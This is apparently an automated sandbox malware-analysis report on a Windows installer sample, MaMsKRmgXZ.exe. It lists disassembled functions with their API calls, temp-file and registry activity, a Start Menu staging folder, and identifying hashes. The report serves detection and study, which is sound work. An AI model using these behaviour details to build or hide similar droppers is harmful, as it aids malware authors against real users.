SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405633
GetLastError.KERNEL32 ref: 0040563D

Strings

C:\Users\user\Desktop, xrefs: 004055C7
ls@, xrefs: 004055FC
C:\Users\user\AppData\Local\Temp\, xrefs: 004055ED
|s@, xrefs: 004055CD

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ls@$|s@
API String ID: 3449924974-3105301103
Opcode ID: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
Instruction ID: d76da5e920ef4cf84c76b5f8b6eadacb43d526ba9f765b2b55af8eda6d007f2e
Opcode Fuzzy Hash: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
Instruction Fuzzy Hash: 90010871C04219EAEF019BA1CC447EFBBB8EB14355F00853AD905B6290E779A605CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406304 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
wsprintfA.USER32 ref: 00406354
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406368

Strings

%s%s.dll, xrefs: 0040634E
\, xrefs: 0040632C
UXTHEME, xrefs: 0040630D

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction ID: 15cbb93803340843acffe9ced60e7e2f3372dd006ff9664fb566d465880257e2
Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction Fuzzy Hash: C8F09C30900116ABDB159768DD0DFFB365CEB08309F14057AB986E11D1D574E9258B99

Uniqueness

Uniqueness Score: -1.00%

Function 00402FFB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403059
GetTickCount.KERNEL32 ref: 004030DA
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00403107
wsprintfA.USER32 ref: 00403117

Strings

... %d%%, xrefs: 00403111

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
Instruction ID: eed10709806649b2ce9ecdbe6bed08e8f554dc741dea3641cf9b2fc180d08aa2
Opcode Fuzzy Hash: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
Instruction Fuzzy Hash: A7515E71901219ABDB10EF65D904A9F3BB8AF48756F14413BFD10BB2C0C7789E51CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405BA2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405BB6
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BD0

Strings

"C:\Users\user\Desktop\MaMsKRmgXZ.exe", xrefs: 00405BA2
C:\Users\user\AppData\Local\Temp\, xrefs: 00405BA5
nsa, xrefs: 00405BAD

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\MaMsKRmgXZ.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2316510883
Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction ID: 2f7af396f84d097035df83fe1d719984909df90e6a6ed76a9758152acb097983
Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction Fuzzy Hash: B9F082367082086BEB108F5ADC04B9B7BA8DF91750F14803BFA08DA291D6B4B9548B69

Uniqueness

Uniqueness Score: -1.00%

Function 6EC016DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6EC01A98: GlobalFree.KERNEL32(?), ref: 6EC01D09
Part of subcall function 6EC01A98: GlobalFree.KERNEL32(?), ref: 6EC01D0E
Part of subcall function 6EC01A98: GlobalFree.KERNEL32(?), ref: 6EC01D13

GlobalFree.KERNEL32(00000000), ref: 6EC01786
FreeLibrary.KERNEL32(?), ref: 6EC01809
GlobalFree.KERNEL32(00000000), ref: 6EC0182E

Part of subcall function 6EC022AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6EC022E0

Part of subcall function 6EC026B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6EC01757,00000000), ref: 6EC02782

Part of subcall function 6EC0156B: wsprintfA.USER32 ref: 6EC01599

Strings

, xrefs: 6EC0180F

Memory Dump Source

Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true

Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 498f05af893b4c714da480fd996f62dc26096455c8971bbfab7f8a9cdf499697
Instruction ID: 557579555372b70d117e0e14758438b6030207782c2842cf607e5701ec57cf5b
Opcode Fuzzy Hash: 498f05af893b4c714da480fd996f62dc26096455c8971bbfab7f8a9cdf499697
Instruction Fuzzy Hash: 994191710003059BDF459FEC9994BD6B7ECBF0532CF048969E9159A08AFB778549CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
Instruction ID: 5540d85999f992b2d0d9c3d63f09df6deeece4c427f082cd61f041684b2cd5b6
Opcode Fuzzy Hash: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
Instruction Fuzzy Hash: 6E216BB1D48208BEEF06AFB4D98AAAD7FB5EB44304F10447EF501B61D1C7B89640DB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040243D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000023,00000011,00000002), ref: 00402488
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,00000011,00000002), ref: 004024C5
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,00000011,00000002), ref: 004025A9

Strings

C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp, xrefs: 00402479, 0040249B, 004024AF, 004024BA

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp
API String ID: 2655323295-1038464266
Opcode ID: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
Instruction ID: 8e9ea0cf859de5a6fe7672b5a81e2234dbec8cc7450cb22075f11fbb1059ccd6
Opcode Fuzzy Hash: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
Instruction Fuzzy Hash: 42119072E00218BEEB01AFA58E49EAE7BB8FB48314F20443BF504B71C1C6B85D419B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040206A Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402095

Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll), ref: 0040516F
Part of subcall function 00405101: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
Part of subcall function 00405101: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
Part of subcall function 00405101: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020A5
GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
Instruction ID: 97d835e61fc7e0b97890b4be7664cc53dce4a02014942e479506a03d8351e840
Opcode Fuzzy Hash: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
Instruction Fuzzy Hash: 4521D871A00214BBCF117FA4CE8DAAE79B4AB44319F20413BFA01B62D0C6FD9981D65E

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00405A0B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004055C7: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae
API String ID: 1892508949-1223762460
Opcode ID: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
Instruction ID: 3a09c20382928311ba1d31a626229d1df209b5e1cddac7105c79dbf72218ebe6
Opcode Fuzzy Hash: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
Instruction Fuzzy Hash: B4112731508141EBCB212FB94D4197F36B0EA96325F28453FE4D2B23E2D63D49429A3F

Uniqueness

Uniqueness Score: -1.00%

Function 00405EC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406105,80000002), ref: 00405F07
RegCloseKey.KERNELBASE(?,?,00406105,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll), ref: 00405F12

Strings

Call, xrefs: 00405EC4, 00405EF8

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
Instruction ID: 897067c620da28adabf34c96f4b8630bfa599ba4fb7ce992f063a5310404d611
Opcode Fuzzy Hash: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
Instruction Fuzzy Hash: 6D015A7251020AABEF22CF61CC09FDB3BACEF55364F004026FA55A2190D278DA54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406A9B Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
Instruction ID: 81ce818a04e0c3cc04ce684d9a2a9ddfd009c22adec174195ca66df60ea86fc9
Opcode Fuzzy Hash: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
Instruction Fuzzy Hash: 69A14271E00229DBDF28CFA8C8446ADBBB1FF44305F15842AD916BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406C9C Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
Instruction ID: 08e1f0bd3e012b2653e952fb076f5459688999f8fa16d8000732ef154d800f7e
Opcode Fuzzy Hash: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
Instruction Fuzzy Hash: 53912370E00229CBEF28CF98C8547ADBBB1FF44305F15816AD956BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004069B2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
Instruction ID: f9b0e14a80994b8e3cce9b061f2e265d206a391058c15f1564a8a9ac8da356b6
Opcode Fuzzy Hash: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
Instruction Fuzzy Hash: 80814571D04229DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004064B7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
